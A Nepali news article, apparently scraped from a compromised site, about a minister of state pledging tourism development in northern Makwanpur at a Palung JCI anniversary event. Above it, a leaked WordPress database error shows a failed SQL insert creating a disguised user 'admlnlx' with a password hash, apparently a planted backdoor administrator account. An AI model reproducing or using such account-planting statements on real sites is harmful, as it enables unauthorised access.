WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJE.8gqvwJ5AVKaiNvavJXrQ6uWrq71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 03:42:10', '', 'admlnlx', 'admlnlx')
जनक लामा,
मकवानपुर, पुस १३–
संस्कृति पर्यटन तथा नागरिक उड्ययन राज्य मन्त्री ईन्द्रबहादुर बाँनियाले उत्तरी मकवानपुरमा रहेका पर्यटकीय स्थललाई पर्यटकिय सूचीमा राख्न सक्दो पहल गर्ने बताउनु भएको छ ।
पालुङ जेसिजको १७ औ पद्स्थापना दिवस कार्यक्रमको उद्घाटन गर्दै उहाँले उत्तरी क्षेत्र पर्यटनको लागि महत्वपूण क्षेत्र रहेकोले यस क्षेत्रको विकास गर्न आफु प्रतिवद्ध रहेको बताउदै योजना बनाएर आउन समेत आग्रह गर्नुभयो ।
जेसिजले समाजको सकारात्मक बाटोमा हिड्नमा धेरै ठूलो भूमिका खेलिरहेको बताउँदै अबका दिनमा पालुङ जेसिजले चुनौतीलाई अवसरमा परिवर्तन गरि अघि बढ्नु पर्नेमा जोड जोड दिनु भयो ।
कार्यक्रम पालुङ जेसिज वर्ष २०१६ का अध्यक्ष तथा निवर्तमान अध्यक्ष शिबकुमार खत्रीको सभाध्यक्ष तथा हेटौडा लेडि जेसिजका अध्यक्ष तथा नेपाल जेसिज वर्ष २०१७ का राष्ट्रिय उपाध्यक्ष शोभा खरेलको विशेष आतिथ्यतामा रहेको थियो ।
कार्यक्रममा संस्थापक अध्यक्ष पुरुषोत्तम ढकालसहित पूर्व अध्यक्षहरु, थाहा नगरपालिकाका कार्यकारी अधिकृत भिम परियार, नेपाली काँग्रेस थाहा नगर कमिटिका सभापति योगेन्द्र मान श्रेष्ठ, नेकपा एमालेका ज्ञानेश्वर ढकाल, नेकपा माओवादी केन्द्र थाहा नगर कमिटिका अध्यक्ष अरुण रायमाझी, राप्रपाका थाहा नगर अध्यक्ष हरेराम कार्की, राष्ट्रिय जनमोर्चा नेपालका जिल्ला अध्यक्ष लक्ष्मण विष्ट लागयतको आथित्यता रहेको थियो ।